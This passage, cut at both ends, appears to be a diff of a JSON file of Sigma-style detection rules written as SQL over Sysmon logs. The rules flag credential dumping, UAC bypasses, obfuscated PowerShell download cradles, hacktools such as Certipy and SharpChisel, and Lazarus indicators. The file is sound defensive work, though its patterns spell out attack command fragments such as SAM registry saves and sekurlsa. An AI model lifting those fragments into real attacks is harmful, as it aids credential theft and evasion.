'\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen 